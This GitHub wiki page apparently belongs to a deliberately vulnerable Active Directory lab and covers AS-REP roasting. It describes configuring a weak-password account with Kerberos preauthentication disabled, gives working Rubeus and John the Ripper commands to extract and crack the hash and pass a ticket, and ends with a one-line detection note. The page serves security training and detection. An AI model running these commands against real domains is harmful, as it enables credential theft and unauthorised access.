ASREP Roast - benlee105/DeliberateVulnADConfig GitHub Wiki

Setting up account for ASREP Roast
  1. Create a User account in Active Directory, with a weak password like P@ssw0rd
  2. Launch Active Directory Users and Computers
  3. Click View > Advanced Features
  4. Right click user account > click Properties > click Account tab > tick "Do not require Kerberos preauthentication" > click OK
Attacking accounts via ASREP Roast
  1. Roast all ASREP roastable accounts using Rubeus

rubeus.exe asreproast /simple /nowrap

  1. Copy out hash and move to Kali:

nano asrep

Right click to paste hash

Ctrl + X > Y > Enter

john --format=krb5asrep --wordlist=<your wordlist> asrep

sample wordlists are generally in /usr/share/wordlists

  1. Copy password from john output, and utilize Rubeus to ask for a TGT, then pass the ticket.

rubeus.exe asktgt /user:<username> /password:<password> /ptt

  1. Check that ticket is successfully imported

klist

Detecting ASREP Roasting
  1. ASREPRoasting with will generate a 4768 event with RC4 encryption and a preauth type of 0.
⚠️ **GitHub.com Fallback** ⚠️